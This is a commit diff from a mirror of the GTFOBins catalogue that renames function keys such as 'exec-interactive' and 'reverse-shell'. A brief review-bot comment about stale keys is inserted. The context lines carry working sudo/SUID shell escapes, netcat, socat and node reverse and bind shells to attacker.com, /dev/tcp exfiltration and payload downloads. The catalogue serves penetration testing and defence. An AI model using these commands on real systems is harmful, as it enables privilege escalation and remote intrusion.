mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-23 21:44:44 +01:00
Reorganize function names
parent
2d3ebbbb05
commit
36dcf7a836
@ -1,9 +1,9 @@
|
||||
exec-interactive:
|
||||
label: Interactive
|
||||
execute-interactive:
|
||||
label: Interactive execute
|
||||
description: It executes interactive commands that may be exploited to break out from restricted shells.
|
||||
|
||||
exec-non-interactive:
|
||||
label: Non-interactive
|
||||
execute-non-interactive:
|
||||
label: Non-interactive execute
|
||||
description: It executes non-interactive commands that may be exploited to break out from restricted shells.
|
||||
|
||||
suid-enabled:
|
||||
@ -26,18 +26,14 @@ upload:
|
||||
label: Upload
|
||||
description: It can exfiltrate files on the network.
|
||||
|
||||
bind-shell:
|
||||
label: Bind shell
|
||||
bind-shell-interactive:
|
||||
label: Interactive bind shell
|
||||
description: It can bind a shell to a local port to allow remote network access.
|
||||
|
||||
reverse-shell:
|
||||
label: Reverse shell
|
||||
reverse-shell-interactive:
|
||||
label: Interactive reverse shell
|
||||
description: It can send back a reverse shell to a listening attacker to open a remote network access.
|
||||
|
||||
load-library:
|
||||
label: Library load
|
||||
description: It loads shared libraries that may be used to run code in the binary execution context.
|
||||
|
||||
bind-shell-non-interactive:
|
||||
label: Non-interactive bind shell
|
||||
description: It can bind a non-interactive shell to a local port to allow remote network access.
|
||||
@ -45,3 +41,7 @@ bind-shell-non-interactive:
|
||||
reverse-shell-non-interactive:
|
||||
label: Non-interactive reverse shell
|
||||
description: It can send back a non-interactive reverse shell to a listening attacker to open a remote network access.
|
||||
|
||||
load-library:
|
||||
label: Library load
|
||||
description: It loads shared libraries that may be used to run code in the binary execution context.
|
||||
|
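Review bot: Nothing in this definitions file or in the visible hunks guards against a binary entry that still uses one of the old keys (`exec-interactive`, `exec-non-interactive`, `bind-shell`, `reverse-shell`) after the rename. The templates that join the two are not shown, so this is inferred, but a key lookup that misses would most likely drop the label and description silently rather than fail the build. I would add a header comment here such as `# Every key used under a binary's functions: map must be defined in this file; rename both together.` and have the site build reject unknown function keys. Separately, the descriptions kept under `bind-shell-interactive` and `reverse-shell-interactive` still describe the generic case, while their non-interactive counterparts say "non-interactive"; adding "interactive" there would make each pair read in parallel.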
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: ash
|
||||
sudo-enabled:
|
||||
- code: sudo ash
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: awk 'BEGIN {system("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: bash
|
||||
sudo-enabled:
|
||||
- code: sudo bash
|
||||
@ -34,7 +34,7 @@ functions:
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
|
||||
reverse-shell:
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: csh
|
||||
sudo-enabled:
|
||||
- code: sudo csh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: dash
|
||||
sudo-enabled:
|
||||
- code: sudo dash
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
ed
|
||||
!/bin/sh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
sudo-enabled:
|
||||
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: env /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo env /bin/sh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: expect -c 'spawn /bin/sh;interact'
|
||||
sudo-enabled:
|
||||
- code: sudo expect -c 'spawn /bin/sh;interact'
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: find . -exec /bin/sh \; -quit
|
||||
sudo-enabled:
|
||||
- code: sudo find . -exec /bin/sh \; -quit
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
ftp
|
||||
!/bin/sh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: gdb -nx -ex '!sh' -ex quit
|
||||
sudo-enabled:
|
||||
- code: sudo gdb -nx -ex '!sh' -ex quit
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: ionice /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo ionice /bin/sh
|
||||
|
@ -7,7 +7,7 @@ description: |
|
||||
/lib64/ld-linux-x86-64.so.2
|
||||
```
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: /lib/ld.so /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo /lib/ld.so /bin/sh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
less /etc/profile
|
||||
!/bin/sh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
man man
|
||||
!/bin/sh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
TERM= more /etc/profile
|
||||
!/bin/sh
|
||||
|
@ -14,13 +14,13 @@ functions:
|
||||
LPORT=12345
|
||||
LFILE=where_to_save
|
||||
nc -l -p $LPORT > "$LFILE"
|
||||
reverse-shell:
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
nc -e /bin/sh $RHOST $RPORT
|
||||
bind-shell:
|
||||
bind-shell-interactive:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||
sudo-enabled:
|
||||
@ -9,7 +9,7 @@ functions:
|
||||
suid-enabled:
|
||||
- code: |
|
||||
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
|
||||
reverse-shell:
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
@ -20,7 +20,7 @@ functions:
|
||||
sh.stdout.pipe(this);
|
||||
sh.stderr.pipe(this);
|
||||
});'
|
||||
bind-shell:
|
||||
bind-shell-interactive:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
export LPORT=12345
|
||||
|
@ -1,12 +1,12 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: perl -e 'exec "/bin/sh";'
|
||||
sudo-enabled:
|
||||
- code: sudo perl -e 'exec "/bin/sh";'
|
||||
suid-enabled:
|
||||
- code: ./perl -e 'exec "/bin/sh";'
|
||||
reverse-shell:
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-non-interactive:
|
||||
execute-non-interactive:
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r 'system(getenv("CMD"));'
|
||||
@ -39,7 +39,7 @@ functions:
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=where_to_save
|
||||
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
|
||||
reverse-shell:
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: python2 -c 'import os; os.system("/bin/sh")'
|
||||
sudo-enabled:
|
||||
- code: sudo python2 -c 'import os; os.system("/bin/sh")'
|
||||
@ -22,7 +22,7 @@ functions:
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=where_to_save
|
||||
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
|
||||
reverse-shell:
|
||||
reverse-shell-interactive:
|
||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: python3 -c 'import os; os.system("/bin/sh")'
|
||||
sudo-enabled:
|
||||
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
|
||||
@ -22,7 +22,7 @@ functions:
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=where_to_save
|
||||
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
|
||||
reverse-shell:
|
||||
reverse-shell-interactive:
|
||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: ruby -e 'exec "/bin/sh"'
|
||||
sudo-enabled:
|
||||
- code: sudo ruby -e 'exec "/bin/sh"'
|
||||
@ -9,7 +9,7 @@ functions:
|
||||
code: |
|
||||
export LPORT=8888
|
||||
ruby -run -e httpd . -p $LPORT
|
||||
reverse-shell:
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-non-interactive:
|
||||
execute-non-interactive:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
CMD="id"
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: setarch $(arch) /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo setarch $(arch) /bin/sh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
HOST=user@attacker.com
|
||||
sftp $HOST
|
||||
|
@ -1,12 +1,12 @@
|
||||
---
|
||||
functions:
|
||||
reverse-shell:
|
||||
reverse-shell-interactive:
|
||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane
|
||||
bind-shell:
|
||||
bind-shell-interactive:
|
||||
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- description: Reconnecting may help bypassing restricted shells.
|
||||
code: ssh localhost /bin/bash --noprofile --norc
|
||||
download:
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: strace -o /dev/null /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo strace -o /dev/null /bin/sh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: taskset 1 /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo taskset 1 /bin/sh
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
tclsh
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- description: BSD version only. Needs to be connected first.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
@ -8,7 +8,7 @@ functions:
|
||||
telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
reverse-shell:
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: vi -c ':!/bin/sh'
|
||||
- code: |
|
||||
vi
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
wish
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
execute-interactive:
|
||||
- code: zsh
|
||||
sudo-enabled:
|
||||
- code: sudo zsh
|
||||
|